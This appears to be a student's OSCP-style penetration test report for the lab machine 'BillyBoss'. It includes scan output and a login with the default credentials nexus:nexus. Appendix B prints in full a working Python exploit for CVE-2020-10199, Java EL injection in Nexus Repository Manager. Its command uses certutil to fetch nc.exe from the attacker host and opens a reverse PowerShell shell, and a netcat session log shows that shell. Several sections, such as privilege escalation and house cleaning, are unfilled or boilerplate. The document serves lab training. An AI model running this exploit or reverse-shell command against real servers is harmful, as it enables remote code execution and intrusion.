BillyBoss

Introduction

The penetration test report contains all efforts that were conducted during client engagement. The purpose of this report is to ensure that the client has a full understanding of penetration testing methodologies as well as the technical knowlegde to remediate any security flaws.

Objective

The objective of this assessment is to perform an internal penetration test against the network. The student is tasked with following methodical approach in obtaining full control of the network. This test should simulate an attacker and how an attacker would start from beginning to end.

Requirements

The pentester will be required to fill out this penetration testing report fully and to include the following sections:

Overall High-Level Summary and Recommendations (non-technical)
Methodology walkthrough and detailed outline of steps taken
Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable
Any additional items that were not included

High-Level Summary

I was tasked with performing an internal penetration test towards the client network. An internal penetration test is a dedicated attack against internally connected systems. The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate internal systems. My overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to the client.

When performing the internal penetration test, there were several alarming vulnerabilities that were identified on client's network. When performing the attacks, I was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During the testing, I had administrative level access to multiple systems. All systems were successfully exploited and access granted. These systems as well as a brief description on how access was obtained are listed below:

192.168.192.61 (hostname) - Name of initial exploit

Recommendations

I recommend patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date.

Methodologies

I utilized a widely adopted approach to performing penetration testing that is effective in testing how well the environments is secured. Below is a breakout of how I was able to identify and exploit the variety of systems and includes all individual vulnerabilities found.

Information Gathering

The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, I was tasked with exploiting the client network. The specific IP addresses were:

Network

192.168.192.0/24

Service Enumeration

The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems. This is valuable for an attacker as it provides detailed information on potential attack vectors into a system. Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test. In some cases, some ports may not be listed.

Penetration

The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems. During this penetration test, I was able to successfully gain access to all systems.

System IP: 192.168.192.61

Server IP Address

Ports Open

192.168.192.61

TCP: 21,80,135,139,445,5040,8081,49664-49669

UDP:

Nmap Scan Results

┌──[Sat Nov 12 12:24:21 AM CST 2022]-[TheScriptKid]-[/opt/OSCP-Exam-Report-Template-Markdown]
├──[wlan0: 192.168.1.153]-[tun0: 192.168.49.192]-[ip: 192.168.192.61]
└──# rscan $ip
rustscan --accessible -u 5000 -b 2500 -a 192.168.192.61 -- -Pn -A
...
PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 127 Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: BaGet
|_http-cors: HEAD GET POST PUT DELETE TRACE OPTIONS CONNECT PATCH
|_http-favicon: Unknown favicon MD5: 8D9ADDAFA993A4318E476ED8EB0C8061
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 127
5040/tcp  open  unknown       syn-ack ttl 127
8081/tcp  open  http          syn-ack ttl 127 Jetty 9.4.18.v20190429
| http-robots.txt: 2 disallowed entries 
|_/repository/ /service/
|_http-server-header: Nexus/3.21.0-05 (OSS)
|_http-favicon: Unknown favicon MD5: 9A008BECDE9C5F250EDAD4F00E567721
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Nexus Repository Manager
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows 7 (91%), Microsoft Windows Server 2008 SP1 or Windows Server 2008 R2 (90%), Microsoft Windows XP SP3 (88%), Microsoft Windows Server 2008 SP1 (88%), Microsoft Windows 10 (87%), Microsoft Windows 7 or Windows Server 2008 R2 (87%), Microsoft Windows Server 2008 R2 (87%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (87%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (87%), Microsoft Windows Vista SP2 (86%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.92%E=4%D=11/12%OT=21%CT=%CU=33850%PV=Y%DS=2%DC=T%G=N%TM=636F3CD9%P=x86_64-pc-linux-gnu)
SEQ(SP=102%GCD=1%ISR=10F%TI=I%II=I%SS=S%TS=U)
OPS(O1=M551NW8NNS%O2=M551NW8NNS%O3=M551NW8%O4=M551NW8NNS%O5=M551NW8NNS%O6=M551NNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)
ECN(R=Y%DF=Y%T=80%W=FFFF%O=M551NW8NNS%CC=N%Q=)
T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 15775/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 35613/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 56094/udp): CLEAN (Failed to receive data)
|   Check 4 (port 18836/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-11-12T06:27:28
|_  start_date: N/A
|_clock-skew: 0s

TRACEROUTE (using port 135/tcp)
HOP RTT      ADDRESS
1   64.95 ms 192.168.49.1
2   65.02 ms 192.168.192.61

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:27
Completed NSE at 00:27, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:27
Completed NSE at 00:27, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:27
Completed NSE at 00:27, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 177.93 seconds
           Raw packets sent: 85 (5.648KB) | Rcvd: 46 (3.236KB)

Foothold

Vulnerability - CVE-2020-10199

Vulnerability Explanation

Nexus Repository Manager 3 versions 3.21.1 and below are vulnerable to Java EL injection which allows a low privilege user to remotely execute code on the target server.

Vulnerability Fix

Update to the latest software release.

Severity: Critical

Reproduction Steps

With the Nmap scan I can see that there a few web ports. Beginning with port 8081 shows me a Nexus Repository Manager and a version number.

I begin to try easily guessable credentials and eventually was successful with nexus:nexus

I proceed to look for known vulnerabilities an exploits on the web application and find that this may be vulnerable to Java EL injection. I begin to download the exploit to my attacking machine.

┌──[Sat Nov 12 12:23:08 PM CST 2022]-[TheScriptKid]-[/tmp]
├──[wlan0: 192.168.1.153]-[tun0: 192.168.49.192]-[ip: 192.168.192.61]
└──# wget https://www.exploit-db.com/raw/49385                                                         
--2022-11-12 12:29:06--  https://www.exploit-db.com/raw/49385
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1778 (1.7K) [text/plain]
Saving to: ‘49385’

49385                                   100%[==============================================================================>]   1.74K  --.-KB/s    in 0s      

2022-11-12 12:29:06 (19.2 MB/s) - ‘49385’ saved [1778/1778]

Viewing the exploit it appears all that I need to modify is the url, command, username, and password. For fully modified exploit see Appendix B - Foothold Exploit Code

URL='http://192.168.1.1:8081'
CMD='cmd.exe /c calc.exe'
USERNAME='admin'
PASSWORD='password'

After setting up a listener, web server to supply the netcat tool, and running the exploit gives me initial access to the system

┌──[Sat Nov 12 02:42:04 PM CST 2022]-[TheScriptKid]-[/tmp]
├──[wlan0: 192.168.1.153]-[tun0: 192.168.49.192]-[ip: 192.168.192.61]
└──# python3 49385.py
Logging in
Logged in successfully
Command executed

┌──[Sat Nov 12 02:42:01 PM CST 2022]-[TheScriptKid]-[/root]
├──[wlan0: 192.168.1.153]-[tun0: 192.168.49.192]-[ip: 192.168.192.61]
└──# python3 -m http.server 80 -d /opt/winreconpack                        
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.192.61 - - [12/Nov/2022 14:42:06] "GET /nc.exe HTTP/1.1" 200 -
192.168.192.61 - - [12/Nov/2022 14:42:06] "GET /nc.exe HTTP/1.1" 200 -

┌──[Sat Nov 12 02:41:58 PM CST 2022]-[TheScriptKid]-[/home/pentester]
├──[wlan0: 192.168.1.153]-[tun0: 192.168.49.192]-[ip: 192.168.192.61]
└──# nc -lnvp 8081                                                                                                                                       130 ⨯
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::8081
Ncat: Listening on 0.0.0.0:8081
Ncat: Connection from 192.168.192.61.
Ncat: Connection from 192.168.192.61:49754.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\nathan\Nexus\nexus-3.21.0-05>

Local.txt Screenshot

Local.txt Contents

PS C:\users\nathan\desktop> hostname; whoami; type local.txt; ipconfig /all
hostname; whoami; type local.txt; ipconfig /all
billyboss
billyboss\nathan
3ad357e0758fac5253432d749bed07e5

Windows IP Configuration

   Host Name . . . . . . . . . . . . : billyboss
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : vmxnet3 Ethernet Adapter
   Physical Address. . . . . . . . . : 00-50-56-BF-90-A1
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv4 Address. . . . . . . . . . . : 192.168.192.61(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.192.254
   DNS Servers . . . . . . . . . . . : 192.168.192.254
   NetBIOS over Tcpip. . . . . . . . : Enabled
PS C:\users\nathan\desktop>

Privilege Escalation

Vulnerability -

Vulnerability Explanation

Vulnerability Fix

Severity: Critical

Reproduction Steps

Proof.txt Screenshot

Proof.txt Contents

Maintaining Access

Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable. The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again. Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.

House Cleaning

The house cleaning portions of the assessment ensures that remnants of the penetration test are removed. Often fragments of tools or user accounts are left on an organization's computer which can cause security issues down the road. Ensuring that we are meticulous and no remnants of our penetration test are left over is important.

After collecting data from the network was completed, I removed all user accounts and passwords as well as the Meterpreter services installed on the system. the client should not have to remove any user accounts or services from the system.

Additional Items

Appendix A - Flag Contents

IP (Hostname)

Local.txt Contents

Proof.txt Contents

x.x.x.x

hash_here

Appendix B - Foothold Exploit Code

# Exploit Title: Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)
# Exploit Author: 1F98D
# Original Author: Alvaro Muñoz
# Date: 27 May 2020
# Vendor Hompage: https://www.sonatype.com/
# CVE: CVE-2020-10199
# Tested on: Windows 10 x64
# References:
# https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
# https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
# 
# Nexus Repository Manager 3 versions 3.21.1 and below are vulnerable
# to Java EL injection which allows a low privilege user to remotely
# execute code on the target server.
#
#!/usr/bin/python3

import sys
import base64
import requests

URL='http://192.168.192.61:8081'
CMD='cmd /c certutil -urlcache -f http://192.168.49.192/nc.exe nc.exe && nc.exe 192.168.49.192 8081 -e powershell.exe'
USERNAME='nexus'
PASSWORD='nexus'

s = requests.Session()
print('Logging in')
body = {
    'username': base64.b64encode(USERNAME.encode('utf-8')).decode('utf-8'),
    'password': base64.b64encode(PASSWORD.encode('utf-8')).decode('utf-8')
}
r = s.post(URL + '/service/rapture/session',data=body)
if r.status_code != 204:
    print('Login unsuccessful')
    print(r.status_code)
    sys.exit(1)
print('Logged in successfully')

body = {
    'name': 'internal',
    'online': True,
    'storage': {
        'blobStoreName': 'default',
        'strictContentTypeValidation': True
    },
    'group': {
        'memberNames': [
            '$\\A{\'\'.getClass().forName(\'java.lang.Runtime\').getMethods()[6].invoke(null).exec(\''+CMD+'\')}"'
        ]
    },
}

r = s.post(URL + '/service/rest/beta/repositories/go/group', json=body)

if 'java.lang.ProcessImpl' in r.text:
    print('Command executed')
    sys.exit(0)
else:
    print('Error executing command, the following was returned by Nexus')
    print(r.text)

PreviousSlort

Last updated 3 years ago

hashtagIntroduction

hashtagObjective

hashtagRequirements

hashtagHigh-Level Summary

hashtagRecommendations

hashtagMethodologies

hashtagInformation Gathering

hashtagService Enumeration

hashtagPenetration

hashtagSystem IP: 192.168.192.61

hashtagFoothold

hashtagPrivilege Escalation

hashtagMaintaining Access

hashtagHouse Cleaning

hashtagAdditional Items

hashtagAppendix A - Flag Contents

hashtagAppendix B - Foothold Exploit Code